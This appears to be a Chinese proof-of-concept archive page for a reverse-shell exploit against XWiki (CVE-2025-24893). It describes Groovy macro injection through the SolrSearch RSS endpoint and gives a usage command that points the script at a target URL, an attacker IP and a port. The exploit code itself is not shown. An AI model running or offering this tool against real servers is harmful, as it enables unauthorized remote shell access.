关联漏洞
描述
Reverse Shell Payload for CVE-2025-24893
介绍
# CVE-2025-24893 - XWiki Remote Code Execution Exploit
> **PoC for CVE-2025-24893 – XWiki `<groovy>` Macro Remote Code Execution**
> Inspired by [Artemir's original PoC](https://github.com/Artemir7/CVE-2025-24893-EXP)
---
## Description
This is a Proof-of-Concept (PoC) exploit for **CVE-2025-24893**, a Remote Code Execution (RCE) vulnerability in vulnerable versions of **XWiki**.
The flaw lies in the improper sanitization of user input within the `SolrSearch` endpoint, which is vulnerable to unsandboxed `<groovy>` macro injection via an RSS feed query.
This script injects a Groovy payload using the `async` macro that results in **command execution on the server**, allowing an attacker to trigger a **reverse shell** back to their system.
---
## Usage
```bash
python3 CVE-2025-24893-reverse-shell.py -u <target_url> -i <attacker_ip> -p <attacker_port>
文件快照
[4.0K] /data/pocs/ac8ba750a04e34217a8461fbcc72aa539a1935be
├── [2.0K] CVE-2025-24893-reverse-shell.py
└── [ 873] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。